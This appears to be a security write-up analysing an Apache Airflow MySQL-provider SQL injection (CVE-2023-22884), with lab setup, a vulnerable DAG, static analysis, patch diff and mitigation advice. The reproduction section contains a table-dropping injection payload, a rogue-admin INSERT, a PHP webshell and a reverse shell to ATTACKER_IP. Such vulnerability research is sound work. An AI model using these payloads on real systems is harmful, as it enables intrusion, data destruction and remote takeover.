Summary
In this CVE analysis I try to investigate a critical security flaw identified within Apache Airflow as **CVE-2023–22884**.
Introduction
In this CVE analysis, I try to investigate a critical security flaw identified within Apache Airflow as CVE-2023–22884. This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0.
The official vulnerability description is a bit confusing:
"Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider."
Fortunately, Snyk makes this statement a bit more clear:
"Affected versions of this package are vulnerable to Command Injection due to lack of sanitization of input to the LOAD DATA LOCAL INFILE statement, which can be used by an attacker to execute commands on the operating system."
If you are not familiar with hacking, command injection is a type of attack that occurs when an attacker is able to manipulate command execution by injecting malicious code into an application. In the context of Apache Airflow, this vulnerability should let malicious users execute arbitrary commands on the underlying host. However, as we will see this is not exactly the case.
Additionally, I also met with another vulnerability type related to the very same CVE called SQL injection.
The vulnerability got the almost highest CVSS base score 9.8:
So what is the flaw actually? Is it a command injection, an SQL injection, or an RCE? All of them? None of them?
In this analysis, our objective is to investigate the location of this vulnerability, understand its triggering mechanisms, identify the specific vulnerability type, and assess its impact on Airflow’s functionality.
About Airflow
Apache Airflow is a popular open-source platform for orchestrating complex data workflows that have emerged as a crucial tool in data engineering and data science domains in the past few years.
You may ask how popular is this software so I leave here some information about it:
- Over 8 million downloads and 20000 contributors. Over 300 companies, including Airbnb, Slack, Walmart, etc., use Airflow to run their data pipelines efficiently.[1]
- Used and popular in bigger companies: 64% of Airflow users work for companies with 200+ employees which is an 11 percent increase compared to 2020.[2]
- By the time of releasing this article, there were more than 11 million downloads last month on PyPI only[3]
Lab Setup Prerequisites
Install Docker and Docker Compose
Follow these instructions:
- Docker: https://docs.docker.com/desktop/install/debian/
- Docker Compose: https://docs.docker.com/compose/install/linux/
MySQL
To get a MySQL 8 server I followed this writeup:
sudo apt update && sudo apt -y install wget
wget https://repo.mysql.com//mysql-apt-config_0.8.22-1_all.deb
sudo dpkg -i mysql-apt-config_0.8.22-1_all.deb
sudo apt update
sudo apt install mysql-server
At the beginning of the research I read about the LOAD DATA INFILE
SQL statement and found that from a specific version, one has to explicitly enable this functionality by setting a variable. The config file on our host machine is located at /etc/mysql/my.cnf
. Let's open it with our favorite editor and add this code to the bottom of the file:
[mysqld]
secure-file-priv = ""
With this variable, we can put a restraint on the directories that can be used to load data into the MySQL database instance. The empty string means loading can happen from anywhere. Otherwise, we get the following error message:
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
Let’s test to confirm if MySQL 8.0 installed on Debian 11/10 /9 is working as expected with
mysql -u root -p
After passing the password you should see your MySQL console:
Let’s create a table for testing purposes:
CREATE DATABASE airflow;
use airflow;
CREATE TABLE test (data varchar(255));
Install, configure, and run Airflow
This time we want to run Airflow in Docker with a local MySQL server we own.
I found a docker compose file that seems to work but because the affected Airflow version is using a higher MySQL provider package we have to write our custom install command into a Dockerfile. You can find both files in this repo.
First, get the file:
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.5.0/docker-compose.yaml'
Then, uncomment the “build .
" line in the docker-compose.yml
:
---
version: '3'
x-airflow-common:
&airflow-common
# In order to add custom dependencies or upgrade provider packages you can use your extended image.
# Comment the image line, place your Dockerfile in the directory where you placed the docker-compose.yaml
# and uncomment the "build" line below, Then run `docker-compose build` to build the images.
image: ${AIRFLOW_IMAGE_NAME:-apache/airflow:2.5.0}
build: . # UNCOMMENTED LINE HERE
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
AIRFLOW__DATABASE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
# For backward compatibility, with Airflow <2.3
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
AIRFLOW__CORE__FERNET_KEY: ''
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
AIRFLOW__API__AUTH_BACKENDS: 'airflow.api.auth.backend.basic_auth'
_PIP_ADDITIONAL_REQUIREMENTS: ${_PIP_ADDITIONAL_REQUIREMENTS:-}
volumes:
- ./dags:/opt/airflow/dags
- ./logs:/opt/airflow/logs
- ./plugins:/opt/airflow/plugins
user: "${AIRFLOW_UID:-50000}:0"
depends_on:
&airflow-common-depends-on
redis:
condition: service_healthy
postgres:
condition: service_healthy
[REDACTED]
And also add the install command to a Dockerfile
located in the same folder as the docker-compose.yaml
file.
FROM apache/airflow:2.5.0
RUN pip install apache-airflow-providers-mysql==3.4.0
Additionally, we have to initialize the Airflow environment. As the official tutorial says, “On Linux, the quick-start needs to know your host user id and needs to have group id set to 0
. Otherwise, the files created in dags
, logs
and plugins
will be created with root
user ownership." So run the following commands:
mkdir -p ./dags ./logs ./plugins ./config
echo -e "AIRFLOW_UID=$(id -u)" > .env
Don’t forget to Initialize the database with docker compose up airflow-init
.
And now build and run the Airflow:
docker-compose up --build
As a result, you should see in the logs that the webserver and other components are up and there is a login form under localhost:8080
:
The default username and password is airflow
.
As a final step here we can check whether the installation of the vulnerable provider version was successful or not with this one-liner:
docker exec -it `docker ps | grep webserver | cut -d " " -f1` bash -c "pip freeze | grep apache-airflow-providers-mysql"
The output should be apache-airflow-providers-mysql==3.4.0
.
Reproducing the vulnerability
Add the MySQL connection
The vulnerability is related to a specific version of an Airflow provider that handles a MySQL connection so this is a good starting point. We can add a connection with a specified provider under Admin / Connections menu. Click on the “+
" icon to do so.
Fill in the necessary data to connect to our local MySQL server:
- Connection Id:
mysql
- Connection type:
MySQL
- Host: your local machine’s IP — you can check it with the command “
hostname -I" or "ip a
" - Shema:
airflow
(this is the name of the database we created) - Login:
root
(can be any other user based on your MySQL configuration) - Password: password to connect to MySQL server
- Port:
3306
(this is the default MySQL port) - Extra:
{"local_infile": true}
(This is an important part to exploit)
Click on “Test
" button if you are ready. A "Connection successfully tested
" text should pop up at the top of the page. Click on "Save
".
It’s interesting thing that it is possible to modify the already defined connections in Airflow by default so if a DAG is using one, you can make it vulnerable.
(See how I found the vulnerable code part in the “Static analysis” section but here we focus on the attack itself.)
Call the vulnerable method
There can be multiple scenarios to exploit this vulnerability, but the most realistic is that a common user can’t add a custom DAG, otherwise, the impact is much less since he/she could run any SQL command explicitly. But what if there is already a DAG we can tamper with? Additionally, modifying an existing connection is also allowed by default in Airflow. So let’s say we have a DAG that extracts and takes the file name given as an additional DAG parameter and call the MySqlHook
's vulnerable bulk_load
method. Sounds like a scenario that can happen when somebody from time to time wants to load several files into a database.
Let’s say we have the following DAG already deployed. For the sake of simplicity, it contains the most necessary stuff only.
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python import get_current_context
from airflow.hooks.mysql_hook import MySqlHook
def get_file_name():
"""Get the user-supplied filename to load into the database from the context"""
context = get_current_context()
return context["params"].get("filename", "test_file")
def get_table_name():
"""Get the user-supplied table name"""
context = get_current_context()
return context["params"].get("table_name", "test_table")
def bulk_load_sql(**kwargs):
"""Call the hook's bulk_load method to load the file content into the database"""
conn = MySqlHook(mysql_conn_id='mysql')
get_filename = get_file_name()
get_tablename = get_table_name()
conn.bulk_load(table=get_tablename, tmp_file=get_filename)
"""Define the DAG"""
dag = DAG(
"bulk_load_from_file",
start_date=datetime(2023, 7, 1),
schedule_interval=None)
"""Define the operator that calls the method to bulk load"""
t1 = PythonOperator(
task_id='bulk_load',
provide_context=True,
python_callable=bulk_load_sql,
dag=dag)
"""Call the operator"""
t1
In get_file_name()
method we extract a variable called "filename
" from the parameters. Let's add it as bulk_load.py
to the dags
folder to test it. As this folder was added as a volume, it will be added as a DAG to Airflow immediately.
Click on the “bulk_load_from_file
" DAG and select "Trigger DAG w/ config
" option.
This page will bring up the configuration box, where you may set up your configuration in JSON format. Set the filename
to "/tmp/test_file
" with payload {"filename":"/tmp/test_file"}
just to see how it works.
Click on Trigger and see the logs of it. You can get the logs of a DAG run by navigating to Graph / {name of the task in the DAG} / Log.
It says the following:
MySQLdb.OperationalError: (3948, 'Loading local data is disabled; this must be enabled on both the client and server sides')
After some sort of googling, it turned out that we have to explicitly enable the local_infile
variable in our local MySQL server with the command SET GLOBAL local_infile=1;
.
Load remote files into the database
Notice that LOAD DATA
is a kind of "vulnerable by design", as you can read MySQL's official documentation because one can load files located at both the server host and the client host. You may ask then why and when this is used. The answer is: it's significantly faster than INSERT
statements. To demonstrate this functionality we will read a remote file and load it to our database. You can skip this section if you want since it's not directly related to the vulnerability itself.
Let’s create a remote file on the worker’s machine that will actually be read by the DAG:
docker exec -it `docker ps | grep worker | cut -d " " -f1` bash -c "echo 'proof' > /tmp/test_file"
Delete everything from the test
table:
Trigger a new DAG run with this config JSON:
{"filename":"/tmp/test_file","table_name":"test"}
Now there is no error message in the logs:
…aaand, see what we have in our database now:
So, this is the expected behavior with the expected inputs. However, we are hackers, so we are not interested in expected inputs and behaviors.
Performing the SQL injection
Our next task is to exploit the vulnerability itself.
Let’s run this dag with the following config JSON:
{"filename":"/tmp/test_file' INTO TABLE test; DROP TABLE test; --","table_name":"test"}
What SQL commands will run based on this payload if we replace it to the original query? The original query is:
LOAD DATA LOCAL INFILE '{tmp_file}'
INTO TABLE {table}
The SQL code provided above is used to load data from a local file into a database table. Here’s a brief breakdown of the code:
LOAD DATA LOCAL INFILE
: This is a MySQL-specific statement used to load data from a local file into a database table. It's used for bulk data import operations.'{tmp_file}'
: This is a placeholder for the path to the local file you want to load data from. The actual path of the file should be specified in place of'{tmp_file}'
.INTO TABLE {table}
: This part of the statement specifies the target database table where you want to load the data. You need to replace{table}
with the actual name of the table where you want the data to be inserted.
So the result will be (the part that is commented out is omitted):
LOAD DATA LOCAL INFILE '/tmp/test_file' INTO TABLE test;
DROP TABLE test; --
The DAG logs will show an error:
But when we check our table we can see the test
table is deleted:
Oh yeah — SQLi is in da house!
What else?
We dropped a table, right? It might sound quite annoying, but nowadays everyone has backups, and by doing this, an attacker can easily draw attention to themselves. Let’s delve into something more realistic. So how else SQL injection can be exploited?
In every database schema that also manages users, there’s at least one dedicated table for this purpose. Suppose we have such a “users
" table is structured as follows:
user_id username email first_name last_name password_hash role
1 user123 user123@example.com John Doe hashed_pw_1 user
2 alice alice@example.com Alice Johnson hashed_pw_2 user
3 bob bob@example.com Bob Smith hashed_pw_3 admin
In the password_hash
column, the hashed version of the user's password is stored. In real-world applications, a cryptographic hash function should be used for password hashing, such as bcrypt, SHA-256, or another strong hash algorithm. In this case, we are using SHA-256. The long password "s3cr3t
" is the hashed version using SHA-256.
Notice the “role
" field as well. What if we could insert a new user with an "admin
" role into the table, which we could then use to log into a platform as an admin? To achieve this, we would need to execute the following SQL command:
INSERT INTO users (username, email, first_name, last_name, password_hash, role)
VALUES ('attacker', 'attacker@vsociety.com', 'Mr.', 'V.', '482551228411e98ad8cb1f8b0a1443c9ffbafc10b630c7646c518ab19331ea7e2cf24ad383527da1071e2177af7e41b9e751c9c4fb2499aa22f69824f9657339', 'admin');
On the other hand, believe it or not, under certain circumstances, it can even lead to Remote Code Execution (RCE). For instance, if there is an opportunity to write files and the server serving the SQL server also runs a web server like Apache. See the following command:
'[...] UNION SELECT '<?php system($_GET['cmd']); ?>' INTO OUTFILE '/var/www/html/shell.php' #
The default root directory for Apache is ‘/var/www/html/
'. Therefore, anything placed in this folder (like shell.php
in this case) will be served. The provided PHP code is a simple webshell, meaning the command specified in the cmd
parameter will run on the OS level through the system PHP command. This is a common method in the case of file-write vulnerabilities for webservers. If, for example, a listener port is initiated on the attacker's side and the above webshell is invoked with the appropriate command, a reverse shell can be obtained:
On the attacker’s machine:
nc -lvnp 4242
curl http://target-server/shell.php?cmd=bash%20-i%20%3E&%20/dev/tcp/ATTACKER_IP/4242%200%3E&1
The payload is URL-encoded for the “bash -i >& /dev/tcp/ATTACKER_IP/4242 0>&1
" command. It's important to note that such actions are typically malicious and illegal, and discussing or using them without proper authorization is against the law. Always use your technical knowledge for ethical and legitimate purposes. Breaking down the command:
bash -i
: This starts an interactive instance of the Bash shell on the target system.>& /dev/tcp/ATTACKER_IP/4242
: This part of the command performs redirection of standard output (file descriptor 1) to a TCP network connection established to the specified IP address (ATTACKER_IP
) and port number (4242
). This means that any output generated by the shell (such as command outputs) will be sent to the attacker's machine over the network connection.0>&1
: This part of the command redirects standard input (file descriptor 0) to the same network connection that was established in the previous step. This allows the attacker to send commands from their machine to the target system through the network connection.
However, with the current system I prepared as a PoC, I was unable to successfully execute this attack.
Static Analysis
The basic architecture of Airflow
Apache Airflow follows a distributed architecture that enables the orchestration and scheduling of complex data workflows. At its core, Airflow consists of several key components that work together to facilitate the efficient execution of tasks and manage dependencies. Let’s see the most important terms to understand the architecture of Airflow and what’s are these components.
- Scheduler: The scheduler component is responsible for determining when and how tasks should be executed. It also submits tasks to the executor to run.
- Executor: Handles running tasks.
- Workers: responsible for executing tasks in a distributed manner. They pull tasks from the task queue and execute them on separate worker nodes, allowing for parallel execution and scalability.
- Task Dependencies: Airflow allows users to define dependencies between tasks using directed acyclic graphs (DAGs). This is the core concept of Airflow. Tasks can be chained together, allowing for complex workflows with conditional branching and parallelism. Tasks are triggered based on their dependencies and the success or failure of preceding tasks.
- Metadata database: Airflow utilizes a metadata database, such as MySQL or PostgreSQL, to store information used by the executor and scheduler about the workflow, tasks, and their dependencies.
- Webserver: Airflow provides a web-based user interface called the Airflow UI or the Airflow Webserver to inspect, trigger and debug the behavior of DAGs and tasks.
- Operators: Airflow provides a wide range of built-in operators that define the actions performed by tasks, such as executing a shell command, running a SQL query, or transferring files. Executors manage the execution of these operators, ensuring they are executed as specified and handling their results and states.
See the architectural schema on the official page:
By leveraging this architecture, Apache Airflow enables users to define, schedule, and monitor complex data workflows. Its distributed nature, coupled with the ability to define dependencies and utilize various executors, makes it a powerful tool for orchestrating data pipelines, ETL (Extract, Transform, Load) processes, and other data-driven tasks in a reliable and scalable manner.
The vulnerable snippet
With such a confusing description we saw in the Introduction section it was not obvious where the vulnerability lies.
As a first step to finding the vulnerable code part, I compared the last vulnerable (3.4.0
) and the next, patched version (4.0.0
) of the
apache-airflow-providers-mysql
package the description is about. For this, I installed both and loaded it to a diff checker.
The change we are interested in affects the mysql.py
.
(The vertica_to_mysql.py
is related to an analytic database management software called Vertica.) See the differences below:
To summarize, in the vulnerable version the local_infile
variable's value is extracted from the JSON the user submits in the "Extra
" field.
The value of the local_infile
variable will be "False
" if it's not given:
local_infile = conn.extra_dejson.get("local_infile", False)
By the way, what is this local_infile
? I found the following in the official Airflow docs:
So not surprisingly this is used for the LOAD DATA LOCAL INFILE
capability the vulnerability is related with.
As a next step, I searched for the text “LOCAL INFILE
" in mysql.py
and found this method (you can also check it in its repo here.):
Notice that there is a similar function for dumping a database table into a file too. As the comment says the purpose of this function is to dump the contents of a specified database table into a tab-delimited file. (This SQL method is even more dangerous but out of scope for now.)
The methods have two parameters:
table
: A string representing the name of the database table from which data will be dumped.tmp_file
: A string representing the path and filename of the tab-delimited file where the data will be written.
Breakdown of the code:
conn = self.get_conn()
: returns a database connection objectcur = conn.cursor()
: creates a cursor object using the database connection. The cursor is used to execute SQL queries and interact with the database.cur.execute(...)
: executes an SQL queryconn.commit()
: commits the transactionconn.close()
: closes the database connection, freeing up resources
Maybe you have already noticed the security risk due to the lack of sanitization of the variables.
In Python, the code snippet you provided is an “f-string”, also known as a formatted string literal. It is a way to create strings with expressions embedded within curly braces {}
. When the string is defined with an 'f' prefix before the opening quotation mark, Python recognizes it as an f-string, and any expressions inside curly braces will be evaluated and replaced with their corresponding values.
At this point, I realized that the vulnerability was a standard SQL injection. It was a quite liberating feeling.
For demonstration purposes here is a simple Python script to see how it works with a malicious input to obtain SQL injection.
tmp_file = '/etc/proof\' INTO TABLE test; DROP TABLE test; --'
table = 'test'query = f"""LOAD DATA LOCAL INFILE '{tmp_file}' INTO TABLE {table}"""
print(query)
See that it contains 2 different SQL commands separated with “;
" mark. Notice the injected SQL command is "DROP TABLE test
". As a general practice, the rest of the query is commented out with "--
" in the payload to prevent errors in the execution.
Now we have the injection point.
Debugging
In Apache Airflow, hooks are not automatically called when a connection is added or modified. Adding or modifying a connection in Airflow only updates the connection configuration in the Airflow metadata database. The connection information is then available for tasks to use when they are executed within a DAG. This fact reduces the severity of the vulnerability since we have to be authenticated to add or modify an existing MySQL connection, add a new DAG, or trigger an existing one with a code that fits our needs. However, never underestimate the power of SQLi. Sometimes it can be escalated even to an RCE.
Let’s set up a debugging environment.
Preparing the environment
Install PyCharm
Since Airflow has limited debugging capabilities, we install the latest version of Pycharm from the official download page.
Let’s put it under /opt/
for now. No installation is needed, can be used as a standalone.
Install Python3.8
We install Python 3.8 for this version of Airflow. I followed this tutorial.
Then I upgraded pip (because why not):
pip3.8 install --upgrade pip
Then activate a virtual environment in a working directory:
cd /opt
mkdir airflow && cd airflow
python3.8 -m venv airflow-2.5.0
cd airflow-2.5.0
chmod +x ./bin/activate
source bin/activate
Install Airflow and set up the environment
You can install Airflow 2.5.0 with this command:
pip3.8 install "apache-airflow==2.5.0" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.5.0/constraints-3.8.txt"
Add an admin user with this command (otherwise we should search for the credentials in the logs):
airflow users create --role Admin --username admin --email admin --firstname admin --lastname admin --password admin
Don’t forget to install the vulnerable MySQL provider:
pip3.8 install apache-airflow-providers-mysql==3.4.0
As a next step, place the vulnerable DAG into the /opt/airflow/airflow-2.5.0/lib/python3.8/site-packages/airflow/example_dags/
folder. You can find this DAG above and in this repo too. Or just download it to the correct location:
wget https://github.com/jakabakos/CVE-2023-22884-Airflow-SQLi/blob/main/dags/bulk_load_from_file.py -P /opt/airflow/airflow-2.5.0/lib/python3.8/site-packages/airflow/example_dags/
Set up a debug environment
Open Pycharm now from the directory of the Airflow project.
Start with setting the proper interpreter. Click on the “Python” label in the bottom right corner of the Pycharm and select “Add New Interpreter”, then “Add Local Interpreter”. Set “/opt/airflow/airflow-2.5.0/bin/python3.8
" as an interpreter.
Our next task is to configure some project settings and the run and debug properties. Add a new Python interpreter with the following settings:
The “Script path” should point to the main method. Notice the standalone
parameter that will run all the Airflow components all at once (triggerer, scheduler, webserver).
Then, search for airflow/providers/mysql/hooks/mysql.py
and set up some breakpoints:
(If you are not familiar with Pycharm: you can set up a new breakpoint by clicking on the place of the red dots.)
Now we have everything to run our Airflow instance from Pycharm. Click on the Debug icon in the top right corner:
You should see everything is OK in the logs in the Pycharm console.
Open a browser and navigate to localhost:8080
.
Log in with “admin
" and "admin
".
Set up a connection for testing purposes under Admin / Connections menu.
Fill the necessary data to connect our local MySQL server:
- Connection Id:
mysql
- Connection type:
MySQL
- Host:
localhost
- Shema:
airflow
- Login:
root
(can be any other user based on your mysql configuration) - Passworrd: password to connect to mysql server
- Port:
3306
- Extra:
{"local_infile": true}
Click on “Test
" button if you are ready. First I got this error message:
libmariadb.so.3: cannot open shared object file: No such file or directory
But this command solved the issue:
sudo apt-get install -y libmariadb-dev
If everything is OK, ten “Connection successfully tested
" text should pop up at the top of the page. Click on "Save
".
Lastly, unpause the “bulk_load_from_file
" DAG from the list.
Running the DAG
Let’s run our DAG with a normal config, and click on “Trigger”.
You can use for example this payload:
{"filename":"/tmp/test_file","table_name":"test"}
But when the DAG is triggered, nothing happens in Pycharm — the breakpoints are not hit.
The problem is because of the different Airflow components running as a subprocess. There is some issue with this so we have to run the different components separately.
I also tried running only one component from Pycharm and the other two from the terminal but the breakpoints were not hit. So because of the simplicity of this bug, I decided to end up here because the core of the bug related to Python’s f-string was shown during the static analysis part.
Patch diffing
The commit of the related patch says the following:
“Move local_infile option from extra to hook parameter
This change is to move local_infile
parameter from connection extra to Hook. Since this feature is only used for very specific cases, it belongs to the "action" it executes not to the connection defined in general. For example in Hive and Vertica transfers, the capability of local_inline is simply enabled by bulk_load parameter - and it allows to use the same connection in both cases."
You can also check it in the related pull request in the official Airflow repo.
The changelog phrases the same issue in a tiny bit more detail from the technical point of view:
“You can no longer pass “local_infile” as extra in the connection. You should pass it instead as hook’s “local_infile” parameter when you create the MySqlHook (either directly or via hook_params).”
The docs have also changed since the related part should have been deleted:
In the fixed version the local_infile can not be submitted as a connection extra parameter and the parameter moved from connection extra to Hook:
Mitigation
The mitigation is simple:
- Update the Airflow to a version above 2.5.0, and
- Apache Airflow MySQL Provider to at least 4.0.0.
Final thoughts
The Apache Airflow SQL injection vulnerability presented a significant challenge in identifying the exact source of the vulnerability due to the confusing and convoluted nature of the initial description. The complex web of dependencies and interactions within such a commonly used software architecture made it even more difficult to pinpoint the specific weakness.
Despite the initial hurdles, the process of investigating and unraveling the intricacies of the vulnerability was an enjoyable and intellectually stimulating experience. As an intricate and widely adopted workflow automation platform, Apache Airflow demanded a deep understanding of its inner workings and interactions with various components.
The effort invested in dissecting and comprehending this complex system not only led to the discovery and resolution of the SQL injection vulnerability but also provided valuable insights into enhancing overall system security and best practices. This undertaking underscored the importance of continuous vigilance in the realm of cybersecurity, especially when dealing with widely-used tools like Apache Airflow.
Resources
[1] https://www.projectpro.io/article/what-is-apache-airflow-used-for/616
[2] https://airflow.apache.org/blog/airflow-survey-2022/
[3] https://pypistats.org/packages/apache-airflow
https://airflow.apache.org/docs
Join vsociety: https://vsociety.io/
Checkout our discord: https://discord.gg/sHJtMteYHQ